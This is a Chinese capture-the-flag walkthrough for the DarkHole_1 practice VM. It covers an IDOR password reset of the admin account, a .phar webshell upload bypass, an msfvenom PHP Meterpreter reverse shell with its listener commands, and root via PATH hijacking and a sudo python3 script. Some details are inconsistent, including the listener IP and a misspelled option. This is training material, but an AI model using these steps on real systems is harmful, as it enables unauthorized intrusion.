DarkHole靶机渗透过程

准备环境

攻击机：Kali-Linux-2021.2
目标靶机：DarkHole_1
平台：VMware Workstation 16
均为NAT模式

一、信息搜集

1.主机嗅探

Kali和DarkHole_1处于同一网段，查看Kali当前IP

ifconfig

可知Kali的IP为192.168.183.128/24，进行网段扫描

netdiscover -r 192.168.183.0/24

扫描结果显示靶机的IP地址为192.168.183.132

2.端口扫描

对靶机进行端口扫描

nmap -A -p- 192.168.183.132

扫出靶机开放端口为22和80

3.访问其web页面

发现网页右上角有Login，点击转到登录界面

没有发现其他有价值信息

二、漏洞挖掘

1.目录扫描

对靶机web进行目录扫描

dirsearch -u http://192.168.183.132

发现以下目录

对config目录进行访问

存在一个名为database.php的文件，但没有读取权限

访问dashboard.php页面

提示无权限进行访问，估计应该是需要登陆

访问upload目录

发现存在名为d.jpg的图片，对其进行查看

将此图拖入WinHex中查看是否含有隐藏信息

其实可以发现其中貌似并没有任何有价值的信息

2.后台渗透

刚才目录扫描时，发现有注册页面，对其访问

发现当username为admin时，会提示用户admin已存在

先随便注册个用户并进入该用户后台

可以发现有个更改密码的选项，可以尝试在修改的同时抓个包

可知现在这个用户的id为2，猜测用户admin的id为1，尝试修改是否能达到更改admin密码的目的

在更改id之后，返回结果已回显密码已被更改，尝试使用用户amdin进行登录

3.拿到webshell

1.中国蚁剑之一句话木马

发现admin的后台有文件上传，推测应该有文件上传漏洞，测试使用一句话木马进行上传

但上传时报错，提示只能上传图片类的文件

经测试将后缀php改为jpg之后能上传，最终发现phar文件可以绕过上传检测，将一句话木马上传之后，使用中国蚁剑对其链接，可拿到后台

完成拿shell

2.msf之反弹shell

用msfvenom生成免杀反弹shell

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.225.128 lport=9999 -e -f raw > msfvenom.phar

将该木马通过admin的后台上传至靶机，并且在msf中启动监听

# 使用监听模块
use exploit/multi/handler
# 设置本地监听服务器
set lhost 192.168.225.128
# 设置本地监听端口
set lport 9999
# 设置监听有效载荷
set patload php/meterpreter_reverse_tcp
# 查看配置信息
show options
# 运行
run

访问刚上传的木马文件，出现回显

完成拿shell

4.提权

发现用户john目录下有可执行的toto文件

尝试执行toto文件

./toto

由回显可知，文件toto是以用户john的身份运行命令id

编辑id文件，写入/bin/bash，将原有的路径写入到环境变量中，再次执行toto文件就会获得john的shell

echo '/bin/bash' > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

password文件下为用户john的密码，可使用ssh登录上去

cat password

查看user.txt可拿到第一个flag

cat user.txt

查看file.py发现该文件为空

cat file.py

查看用户john所拥有的权限

sudo -l

发现可以用root身份使用python3命令执行file.py文件

可以写入shell到file.py文件中，然后使用sudo命令执行

echo "import os;os.system('/bin/bash')" > file.py 

执行file.py

sudo python3 /home/john/file.py

进入root家目录查看文件

cd ~ && ls -lha

最后的flag值在root.txt中

目标靶机已完成渗透